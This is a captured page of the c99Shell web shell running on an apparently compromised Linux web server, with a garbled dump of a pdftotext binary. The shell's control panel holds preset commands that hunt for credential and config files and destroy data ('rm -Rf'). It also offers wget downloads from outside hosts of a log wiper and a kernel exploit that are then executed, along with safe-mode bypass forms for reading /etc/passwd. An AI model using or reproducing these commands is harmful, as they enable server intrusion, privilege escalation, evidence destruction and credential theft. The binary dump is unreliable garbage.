!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 52.27 GB of 127.8 GB (40.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pdftotext (17.82 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ELF4DB4 ( 444444&+&+0 0HHH Ptd(DDQtd/lib/ld-linux.so.2GNU 1 p 15:qf|(CEK8qXfUayIk_IyF&Dwc ' [S4vn2lEI~<e-1my=IZ>e*_=$s@&CeyY{Ob%+s$Rȣ7% @"M{MAs]pMMkM-MM^M:@MʄJM5XMZhMBH tMWMq5.M`|+~MMhP1D''(7@hdldL@BUċB$rMĿAD$A$D$>D$c$EQM $E$6$MEĉL$$D$UċB$7QËE$,$dMÉ $$OUĉÉ$$:UÉ4$$#M뽉É<$$ U뻉ËEĉ$$UWVS ]<-ts<+toT1ɋ8DGuˀ.tQ3~ []pdftotextCouldn't get text encoding.pdf.PDF.html.txtwbCouldn't open text file '%s' Title �Subject�"> �Keywords�Author�<meta name="Author" content="�Creator�Producer�CreationDate�LastModifiedDate�</head> �<body> �<pre> �ab�</pre> �</body> �</html> �-f�first page to convert�-l�last page to convert�-layout�-raw�-htmlmeta�-enc�output text encoding name�-eol�-nopgbrk�-opw�-upw�-q�-cfg�-v�-h�print usage information�--help�-?��Copyright 1996-2004 Glyph & Cog, LLC����Bad '-eol' value on command line ���<meta name="Subject" content="��<meta name="Keywords" content="�<meta name="Creator" content="��<meta name="Producer" content="�<meta name="CreationDate" content=""> ��<meta name="ModDate" content=""> ���maintain original physical layout���keep strings in content stream order����generate a simple HTML file, including the meta information�output end-of-line convention (unix, dos, or mac)���don't insert page breaks between pages��owner password (for encrypted files)����user password (for encrypted files)�don't print any messages or errors��configuration file to use in place of .xpdfrc���print copyright and version info������BUsage: %s [options]� %s� <string>� <int>� <fp>�%-*s�: %s�--�Internal error in arg table ���;@������`���<������|���<��8��X���������zPL�|�@� $��� ������pAB FEF��$���H���0\��AB AD���0���p��� ��D � F AB IK����������| ��������p���AB F����8���0G���AB B������X�����AB AG���x�����AB F�����(��8�B3����;��N�X����:������)����������������� � �� � �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������{�������������������������������� ��� ���oh������ ���@�� ������������������������������������(���������o0o���ooxoT��ŏo��������������������������ɲ��P������`50D�  P�0��`{pk�`�P A�y+�PJв� �@� p4�@К�@<�P������������������������������������������������������������$�������'=���Ե����@U����ܵ����]����ص����b����е����8l������q��� ���t����ȵ�������@!���Ч���!�������̵����������@��������p����ĵ����ʥ����ĵ����ɥ����ĵ����Х����ĵ�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������`e����� d�d������������������������������������������libpoppler.so.1�__gmon_start__�_Jv_RegisterClasses�_ZN6PDFDoc12displayPagesEP9OutputDeviiddiiiiPFiPvES2_PFiP5AnnotS2_ES2_�_ZN6Object8memCheckEP8_IO_FILE�_ZN4Dict6lookupERK10UGooStringP6Object�_ZN4XRef10getDocInfoEP6Object�_ZN9GooString6appendEPKc�_ZN12GlobalParams10setTextEOLEPc�_ZN12GlobalParams17setTextPageBreaksEi�_ZN6PDFDocD1Ev�_ZN10UGooStringC1EPKc�_ZN9GooStringD1Ev�_ZN10UnicodeMap9decRefCntEv�_ZN6PDFDocC1EP10BaseStreamP9GooStringS3_Pv�_ZN12GlobalParams15getTextEncodingEv�_fini�_ZN10UnicodeMap10mapUnicodeEjPci�_ZN13TextOutputDevC1EPciii�_init�_ZN6Object4freeEv�_ZN10FileStreamC1EP8_IO_FILEjijP6Object�_ZN9GooStringC1EPKc�_ZN12GlobalParams15setTextEncodingEPc�_ZN9GooStringC1EPS_�_ZN12GlobalParams11setErrQuietEi�_ZN12GlobalParamsC1EPc�_Z5erroriPcz�_ZN9GooString3cmpEPKc�_ZN12GlobalParamsD1Ev�globalParams�_ZN9GooStringC1EPKci�_ZN10UGooStringD1Ev�_ZN6PDFDocC1EP9GooStringS1_S1_Pv�libcairo.so.2�libfreetype.so.6�libfontconfig.so.1�libstdc++.so.6�_Znwj�_ZdlPv�__gxx_personality_v0�libm.so.6�libgcc_s.so.1�_Unwind_Resume�libc.so.6�_IO_stdin_used�strncpy�__stack_chk_fail�stdin�strlen�__fprintf_chk�stdout�fputc�fputs�fclose�__strtol_internal�__ctype_b_loc�stderr�fwrite�fprintf�__strtod_internal�fopen64�strcmp�__libc_start_main�_edata�__bss_start�_end�GCC_3.0�CXXABI_1.3�GLIBCXX_3.4�GLIBC_2.4�GLIBC_2.3�GLIBC_2.1�GLIBC_2.3.4�GLIBC_2.0�libz.so.1�libpng12.so.0�libXrender.so.1�libX11.so.6�libexpat.so.0�/lib/ld-linux.so.2�libXau.so.6�libXdmcp.so.6�libdl.so.2���pdftotext.debug�YELF��������������4���6������4� ��(������4���44���������������4��44���������������������&+��&+������������0�����������������0�����������������H��HH ��� ���������Ptd(��D���D���������Qtd�������������������������� ���������44�����������������������������HH�� ������������������!���o���hh��P����������������+��� ����������������������3���������xx��@�����������������;���o��� ��x����������������H���o���00 ������������������W��� ������ ��(����������������`��� ������ ������� ���������i��������� ��������������������d��������� ������������������o����������������������������u���������#��������������������{���������ģ#��.��������������������������(��D���������������������������88)��8��������������������������pp*�������������������������������0�����������������������������0�����������������������������0�����������������������������0���������������������������1����������������������������1������������������������������2������������ ����������������5��8��������������������������������5����������������������������������5���������������������.shstrtab�.interp�.note.ABI-tag�.gnu.hash�.dynsym�.dynstr�.gnu.version�.gnu.version_r�.rel.dyn�.rel.plt�.init�.text�.fini�.rodata�.eh_frame_hdr�.eh_frame�.gcc_except_table�.ctors�.dtors�.jcr�.dynamic�.got�.got.plt�.data�.bss�.gnu_debuglink�.dynbss�.gnu.liblist�.gnu.conflict�.gnu.prelink_undo������������������������������������������� ���������44�����������������������������HH�� ������������������!���o���hh��P����������������+��� �������������������������o���xx��T�����������������������̆�������������� ���;���o��� ��x����������������H���o���00 ������������������W��� ������ ��(����������������`��� ������ ������� ���������i��������� ��������������������d��������� ������������������o����������������������������u���������#��������������������{���������ģ#��.��������������������������(��D���������������������������88)��8��������������������������pp*�������������������������������0�����������������������������0�����������������������������0�����������������������������0���������������������������1����������������������������1������������������������������2������������ ����������������5�����������������������������5��(������������������3���������5���������������������������������;���������������������������������;��l������������������������������A��&�����������������</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2Fusr%2Fbin%2F"><b>Command execute</b></a> ::</b></p></td></tr> <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="?"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="cmd" size="50" value=""><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="?act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/usr/bin/"><select name="cmd"><option value="ls -la">-----------------------------------------------------------</option><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name "config*"">find config* files</option><option value="find . -type f -name "config*"">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> <br> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2Fusr%2Fbin%2F"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> <tr> <td width="50%" height="83" valign="top"><center> <div align="center">Useful Commands </div> <form action="?"> <div align="center"> <input type=hidden name=act value="cmd"> <input type=hidden name="d" value="/usr/bin/"> <SELECT NAME="cmd"> <OPTION VALUE="uname -a">Kernel version <OPTION VALUE="w">Logged in users <OPTION VALUE="lastlog">Last to connect <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? <OPTION VALUE="which wget curl w3m lynx">Downloaders? <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO <OPTION VALUE="netstat -atup | grep IST">Open ports <OPTION VALUE="locate gcc">gcc installed? <OPTION VALUE="rm -Rf">Format box (DANGEROUS) <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 <OPTION VALUE="./zap2">WIPELOGS PT3 <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) </SELECT> <input type=hidden name="cmd_txt" value="1">   <input type=submit name=submit value="Execute"> <br> Warning. Kernel may be alerted using higher levels </div> </form> </td> <td width="50%" height="83" valign="top"><center> <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> <input name="q" type="text" id="q" value="Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686"> <input type="hidden" name="client" value="firefox-a"> <input type="hidden" name="rls" value="org.mozilla:en-US:official"> <input type="hidden" name="hl" value="en"> <input type="hidden" name="hs" value="b7p"> <input type=submit name="btnG" VALUE="Search"> </form></center> </td> </tr></TABLE><br> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2Fusr%2Fbin%2F"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> <tr> <td width="50%" height="83" valign="top"><center> <div align="center">Php Safe-Mode Bypass (Read Files) </div><br> <form action="?"> <div align="center"> File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> <br> </div> </form> </td> <td width="50%" height="83" valign="top"><center> <center>Php Safe-Mode Bypass (List Directories): <form action="?"> <div align="center"><br> Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> </form></center> </td> </tr></TABLE><br> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr> <td width="50%" height="1" valign="top"><center><b>:: <a href="?act=search&d=%2Fusr%2Fbin%2F"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> <td width="50%" height="1" valign="top"><center><b>:: <a href="?act=upload&d=%2Fusr%2Fbin%2F"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"> <input type=submit name=submit value="Upload"><br><font color=red>[ Read-Only ]</font></form></center></td> </tr> </table> <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="?"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="mkdir" size="50" value="/usr/bin/"> <input type=submit value="Create"><br><font color=red>[ Read-Only ]</font></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="mkfile" size="50" value="/usr/bin/"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><font color=red>[ Read-Only ]</font></form></center></td></tr></table> <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="?"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="/usr/bin/"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="?"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="f" size="50" value="/usr/bin/"> <input type=submit value="Go"></form></center></td></tr></table> <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c999shell v. 1.0 pre-release build #16 <a href="?act=about"><u><b>Modded by</b></u></a> Shadow & Preddy | <a href="http://rootshell-security.net"><font color="#FF0000">RootShell Security Group</font></a><font color="#FF0000"></font> | <a href="http://r57shell.net"><font color="#FF0000">r57 c99 shell</font></a><font color="#FF0000"></font> | Generation time: 0.0056 ]--</b></p></td></tr></table> </body></html>